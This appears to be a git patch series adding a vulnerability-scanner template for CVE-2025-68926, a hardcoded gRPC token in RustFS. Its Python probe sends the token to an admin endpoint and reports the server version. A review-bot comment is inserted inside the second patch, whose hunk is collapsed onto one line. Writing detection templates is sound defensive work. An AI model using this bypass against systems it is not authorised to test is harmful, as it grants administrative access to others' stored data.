From 37c92114fcf95b694767813f2189b23db0e51f6f Mon Sep 17 00:00:00 2001
From: Valentin Lobstein
Date: Mon, 5 Jan 2026 00:56:33 +0100
Subject: [PATCH 1/2] feat: add CVE-2025-68926 - RustFS Hardcoded gRPC Token
---
 code/cves/2025/CVE-2025-68926.yaml | 88 ++++++++++++++++++++++++++++++
 1 file changed, 88 insertions(+)
 create mode 100644 code/cves/2025/CVE-2025-68926.yaml
diff --git a/code/cves/2025/CVE-2025-68926.yaml b/code/cves/2025/CVE-2025-68926.yaml
new file mode 100644
index 00000000000..f6de6d95584
--- /dev/null
+++ b/code/cves/2025/CVE-2025-68926.yaml
@@ -0,0 +1,88 @@
+id: CVE-2025-68926
+
+info:
+ name: RustFS < 1.0.0-alpha.77 - Hardcoded gRPC Authentication Token
+ author: Chocapikk,bilisheep
+ severity: critical
+ description: |
+ RustFS before 1.0.0-alpha.77 uses a hardcoded gRPC authentication token "rustfs rpc" that cannot be changed without recompiling.
+ This allows unauthenticated remote attackers to gain full administrative access to the gRPC API.
+ impact: |
+ Full administrative access to RustFS including reading, writing, and deleting all stored data.
+ remediation: |
+ Upgrade to RustFS 1.0.0-alpha.77 or later.
+ reference:
+ - https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2025-68926
+ cwe-id: CWE-798
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: rustfs
+ product: rustfs
+ tags: cve,cve2025,rustfs,grpc,auth-bypass,hardcoded-credentials
+
+variables:
+ HOST: "{{Host}}"
+ PORT: "{{Port}}"
+
+code:
+ - engine:
+ - py
+ - python3
+
+ source: |
+ import socket, os, re
+ from h2.connection import H2Connection
+ from h2.config import H2Configuration
+ from h2.events import DataReceived, TrailersReceived, StreamEnded
+
+ host, port = os.getenv('HOST'), int(os.getenv('PORT'))
+ sock = socket.create_connection((host, port), timeout=10)
+ sock.settimeout(5)
+
+ conn = H2Connection(H2Configuration(client_side=True))
+ conn.initiate_connection()
+ sock.sendall(conn.data_to_send())
+
+ sid = conn.get_next_available_stream_id()
+ hdrs = [(':method','POST'),(':scheme','http'),(':authority',f'{host}:{port}'),
+ (':path','/node_service.NodeService/ServerInfo'),
+ ('content-type','application/grpc'),('authorization','rustfs rpc'),('te','trailers')]
+ conn.send_headers(sid, hdrs, end_stream=False)
+ conn.send_data(sid, b'\x00\x00\x00\x00\x00', end_stream=True)
+ sock.sendall(conn.data_to_send())
+
+ body, status = b'', None
+ while True:
+ data = sock.recv(65535)
+ if not data: break
+ for e in conn.receive_data(data):
+ if isinstance(e, DataReceived):
+ body += e.data
+ conn.acknowledge_received_data(e.flow_controlled_length, e.stream_id)
+ elif isinstance(e, TrailersReceived):
+ status = dict(e.headers).get(b'grpc-status', b'').decode()
+ elif isinstance(e, StreamEnded): break
+ else: sock.sendall(conn.data_to_send()); continue
+ break
+ sock.close()
+
+ if status == '0' and len(body) > 5:
+ m = re.search(rb'(\d+\.\d+\.\d+-alpha\.\d+)', body)
+ print(m.group(1).decode() if m else 'grpc-auth-bypass')
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(response, "alpha") || contains(response, "grpc-auth-bypass")'
+
+ extractors:
+ - type: regex
+ name: version
+ regex:
+ - "(\\d+\\.\\d+\\.\\d+-alpha\\.\\d+|grpc-auth-bypass)"
+# digest: 4a0a00473045022044ca1a38c373dfea00acc161c68fc55ca9f4e3d49383834f03b824e1f78e2acb0221008e3884a7f2e2788c0648838ad0e5d524f2f1471f1381c9fc6f8b9c418c533134:3ebfdc4ea1f37636a2ce428217ae7f8d
\ No newline at end of file
From 38ae0d7e5cff56b3cf6eb32d87aea265a5faaeb4 Mon Sep 17 00:00:00 2001
From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com>
Date: Mon, 5 Jan 2026 13:50:28 +0530
Subject: [PATCH 2/2] Update CVE-2025-68926.yaml
---
 code/cves/2025/CVE-2025-68926.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/code/cves/2025/CVE-2025-68926.yaml b/code/cves/2025/CVE-2025-68926.yaml
index f6de6d95584..39e0857123c 100644
--- a/code/cves/2025/CVE-2025-68926.yaml
+++ b/code/cves/2025/CVE-2025-68926.yaml
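Review bot: The receive loop in `source` only reaches `sock.close()` on the normal path — a `sock.recv` timeout (5 s, raised as `socket.timeout`, an `OSError` subclass) or an h2 `ProtocolError` from a listener that does not speak cleartext HTTP/2 escapes the script as a traceback instead of producing empty output, so the engine sees a script error rather than a clean non-match. Wrapping the loop in `try` / `except (OSError, ProtocolError)` / `finally: sock.close()` keeps every outcome on the same path: print the version or marker only when grpc-status is 0, print nothing otherwise. A second caveat worth a comment next to `socket.create_connection`: the probe is h2c-only (`(':scheme','http')`, no TLS wrapping), so a deployment that terminates TLS on the gRPC port fails the handshake and a vulnerable build is reported as clean — I cannot tell from this hunk whether the RustFS gRPC listener can be TLS-fronted, so treat this as a coverage note rather than a defect. The trailers-only error response (grpc-status carried in the first HEADERS frame, which h2 surfaces as `ResponseReceived`, not `TrailersReceived`) leaves `status` as `None`, which is the correct non-match for a rejected token; a one-line comment saying so would stop a future edit from "fixing" it.
```python
from h2.exceptions import ProtocolError
# … unchanged: h2c connection setup and ServerInfo request …
body, status = b'', None
try:
    while True:
        # … unchanged: receive loop (DataReceived / TrailersReceived / StreamEnded handling) …
except (OSError, ProtocolError):
    status = None  # timeout, reset, or not an h2c listener: report nothing, not a traceback
finally:
    sock.close()
# … unchanged: grpc-status 0 check and version print …
```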
@@ -5,14 +5,14 @@ info: author: Chocapikk,bilisheep severity: critical description: | - RustFS before 1.0.0-alpha.77 uses a hardcoded gRPC authentication token "rustfs rpc" that cannot be changed without recompiling. - This allows unauthenticated remote attackers to gain full administrative access to the gRPC API. + RustFS before 1.0.0-alpha.77 used a hardcoded gRPC authentication token "rustfs rpc" that could not be changed without recompiling and this allowed unauthenticated remote attackers to gain full administrative access to the gRPC API. impact: | Full administrative access to RustFS including reading, writing, and deleting all stored data. remediation: | Upgrade to RustFS 1.0.0-alpha.77 or later. reference: - https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj + - https://nvd.nist.gov/vuln/detail/CVE-2025-68926 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -23,7 +23,7 @@ info: max-request: 1 vendor: rustfs product: rustfs - tags: cve,cve2025,rustfs,grpc,auth-bypass,hardcoded-credentials + tags: cve,cve2025,rustfs,grpc,auth-bypass,code variables: HOST: "{{Host}}" @@ -85,4 +85,4 @@ code: name: version regex: - "(\\d+\\.\\d+\\.\\d+-alpha\\.\\d+|grpc-auth-bypass)" -# digest: 4a0a00473045022044ca1a38c373dfea00acc161c68fc55ca9f4e3d49383834f03b824e1f78e2acb0221008e3884a7f2e2788c0648838ad0e5d524f2f1471f1381c9fc6f8b9c418c533134:3ebfdc4ea1f37636a2ce428217ae7f8d \ No newline at end of file +# digest: 4a0a00473045022015cbdaff0a72de87b3a5238a9133b95eac29d3445d27d1deb3b696b71739d4540221009846fa120f8cff6e1279f73606d6598fa0047298a7f9f01f29663ac5a6795925:2592222ea8b5b5922b8de61fd7ebe9f8 \ No newline at end of file